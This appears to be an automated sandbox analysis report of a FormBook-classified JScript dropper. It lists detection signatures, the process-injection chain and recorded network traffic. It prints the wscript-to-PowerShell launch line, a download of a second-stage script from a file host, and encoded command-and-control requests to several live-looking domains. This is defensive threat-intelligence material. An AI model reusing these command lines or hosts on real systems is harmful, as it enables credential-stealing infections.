Edit tour

Windows Analysis Report
11001_10032.jse

Overview

General Information

Sample name:	11001_10032.jse
Analysis ID:	1595900
MD5:	7d9d9bf2e53af7456d06ff9397e742ee
SHA1:	e65297914a9e89bd693c332c4e38d18089d30ef1
SHA256:	0c073edae8314eb90ac4d7ee3c46428a22eb787f12df3ce0465f4cb924ed05c6
Tags:	jseuser-smica83
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains very large strings

AI detected suspicious sample

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

JavaScript source code contains functionality to generate code involving a shell, file or stream

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 3196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 3548 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: A8E663A472E2702B7446D20CCE906A18)

RegAsm.exe (PID: 5104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 4960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

W4ja93oMuuBdSP.exe (PID: 4856 cmdline: "C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\GZV8lYieC1kMRM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

sxstrace.exe (PID: 5480 cmdline: "C:\Windows\SysWOW64\sxstrace.exe" MD5: 209969CD31095C47FFB25959B10917F3)

W4ja93oMuuBdSP.exe (PID: 3808 cmdline: "C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\3vkkebgT.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 2004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 3196	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8a247:$b1: ::WriteAllBytes( 0x8a263:$b2: ::FromBase64String( 0x834df:$s1: -join 0x883df:$s1: -join 0x3fc100:$s1: -join 0x4091d5:$s1: -join 0x40c5a7:$s1: -join 0x40cc59:$s1: -join 0x40e74a:$s1: -join 0x410950:$s1: -join 0x411177:$s1: -join 0x4119e7:$s1: -join 0x412122:$s1: -join 0x412154:$s1: -join 0x41219c:$s1: -join 0x4121bb:$s1: -join 0x412a0b:$s1: -join 0x412b87:$s1: -join 0x412bff:$s1: -join 0x412c92:$s1: -join 0x412ef8:$s1: -join
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ProcessId: 6268, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ProcessId: 6268, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 3196, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Windows executable base64 encoded

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T13:18:57.030255+0100	2018856	1	A Network Trojan was detected	108.181.20.35	443	192.168.2.4	49731	TCP

ETPRO MALWARE Likely Dropper Doc GET to .moe TLD

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T13:18:56.939087+0100	2827578	1	A Network Trojan was detected	192.168.2.4	49731	108.181.20.35	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

ReversingLabs: Detection: 58%

Yara detected FormBook

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: sxstrace.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sxstrace.pdbGCTL source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778257043.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1925948690.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Windows\SysWOW64\sxstrace.exe

Code function: 8_2_004FC550 FindFirstFileW,FindNextFileW,FindClose,

8_2_004FC550

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: 11001_10032.jse	Argument value : ['"WScript.Shell"']	Go to definition
Source: 11001_10032.jse	Argument value : ['"WScript.Shell"', '"Scripting.FileSystemObject"']	Go to definition
Source: 11001_10032.jse	Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']	Go to definition

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 4x nop then xor eax, eax	8_2_004E9EA0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 4x nop then mov ebx, 00000004h	8_2_043104CE
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 4x nop then xor eax, eax	12_2_055D3B38

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
Source: Network traffic	Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49731

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 108.181.20.35 443

Source:	DNS query: www.brothersharetender.xyz
Source:	DNS query: www.extremedoge.xyz
Source:	DNS query: www.meacci.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /p53ou1.ps1 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zt2z/?MXwP=r6KXAX&hJmlwzIP=xrZBxJYgw8cIQMiqBrQZCYZ61pZy1dzsCIunmK+cvRjjBmIrzA2dxOVWDq4Jp+FwENZ0JGktrRBqMPL/mVPT2t/SNJFN32SpTrkJkEsgpQXd8JnHvN7s+C8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.brothersharetender.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /d8se/?hJmlwzIP=/SD9pFSzQOAsk6zpaLb1FttUUALj7PaZHGb2u7tA7jL8hbNivAh9haS7EyITZnMmxBIyan01l3aOwv4XP5Hz0TsVHJlG4hqqstoqSjCRMSUsAc8HmPthR4w=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.extremedoge.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /y3n2/?hJmlwzIP=YYHifcw1ROMF/3RuimpNfLhUsxuxcMKtO4hXXvbRKVUVh0h/q4DMqrOnAhjmriRcqxzsaBbGiU8bH2oMXqD7zJXTKDI0OQUw5wG7ZoblKeO6xygGb+5lBKM=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.meacci.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /q2xw/?hJmlwzIP=86ngbchxwzH4i1X9tvmDuu6h7KJUbTio6Z6AqXex3cvjnWz71i6By1b+gePkvn/3vIhelgCsabemLlfWnEKjEh6EsUgiLzm62QdsAvr1MIDgwhA918qePzY=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.laohuc58.netUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /1jgm/?MXwP=r6KXAX&hJmlwzIP=eA6uj9mZZG+EKrxfsgaQ42jUHFJ9YTaKp1gfdi5CfcM9nM+TLjgWIBBxg97B6s/Mfw+pZcxy3UCwgSBQo6fC0TmW4jrT+zNrDB2c59DmLVqXHBtysJ+4ikY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.zltbd.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /fm7p/?hJmlwzIP=fBQGVIP7Njvsfk9lzVhNu8pCqf4YkOx9Vaqk3JyU25ETPeViuHfh6mR7/D77kz//dgcg4mAG64G/nkTmvcQD6acAcwOPjm8QE+VPRg3PkMui+g1AImFFsl0=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.67051.appUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
Source: global traffic	HTTP traffic detected: GET /ai0p/?hJmlwzIP=rZDqlkYBI8Udwc1PVvW3YX5i1YktqfnUU600R0dEHTi0g/oFcrH0B4P/KXYKt3XPj/KAHRXAsYNPXagjETy9Mc/FYLSfpAXhK3jVe/8+frzlRGbW2etvbkQ=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeHost: www.lifesentials.lifeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)

Source: global traffic	DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic	DNS traffic detected: DNS query: www.brothersharetender.xyz
Source: global traffic	DNS traffic detected: DNS query: www.extremedoge.xyz
Source: global traffic	DNS traffic detected: DNS query: www.meacci.xyz
Source: global traffic	DNS traffic detected: DNS query: www.laohuc58.net
Source: global traffic	DNS traffic detected: DNS query: www.zltbd.top
Source: global traffic	DNS traffic detected: DNS query: www.67051.app
Source: global traffic	DNS traffic detected: DNS query: www.lifesentials.life

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:26 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:29 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:31 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:34 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:20:59 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 